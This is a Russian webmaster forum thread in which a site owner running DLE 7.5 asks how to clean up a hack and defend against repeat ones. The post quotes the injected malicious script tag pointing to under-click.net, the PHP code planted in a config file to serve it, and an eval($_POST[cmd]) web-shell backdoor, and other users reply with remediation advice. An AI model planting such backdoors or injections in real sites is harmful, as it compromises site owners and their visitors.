- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Начну сначала ))
DLE 7.5
Ифреймы периодически, вставляются в несколько мест:
1) engine/engine.php - между метатегами
<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=****"></script>
вот такого плана
2) public_html/engine/data/referer.conf.php
if ((!isset($_COOKIE['dle_password'])) and ($_SERVER['REMOTE_ADDR']!="**.***.**.**") ) {
echo <<<HTML
<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=****"></script>
HTML;
}
вот такая дописка )). Причем иногда созданная апачем, и просто так не удалить, пока не сменить права в директадмине.
3) тупо в каждую краткую новость
В связи с этим вопрос - как обезопасить себя в дальнейшем - заплатки вроде все стоят. Комп регулярно сканирую Каспером + Spyware Doctor-ом.
За разумную цену заплачу за стоящие заплатки в личном порядке. Хелп в общем.
Версию давно пора обновить, сейчас актуальная 9.0
спасибо КЭП )) Мне нужны советы, как защитить эту версию, да и непонятно в ней ли дело, или мне шелл залили на сервак
Там с момента выхода вашей версии столько дыр нашли что проще воду решетом носить.
я же написал - ВСЕ заплатки от dle-news проставлены + еще парочку своих
stopbaza добавил 16.11.2010 в 17:50
Хелп ))
Нашел в одном из конфигов такую конструкцию:
'sea_sort' => "{${@eval($_POST[cmd])}}",
ввиду php безграмотности только накопал, что так подключается шелл. А как его вычислить на серваке?
'sea_sort' => "{${@eval($_POST[cmd])}}",
ввиду php безграмотности только накопал, что так подключается шелл. А как его вычислить на серваке?
Ищите по логам SQL-injection откуда прилетела, и ставьте заплатки на те модули, заодно и пароли на БД потом смените. Все остальное безобразие на сайте - следствие работы с админкой и шеллом.
дк удаляйте эти скрипты и все. права на запись 444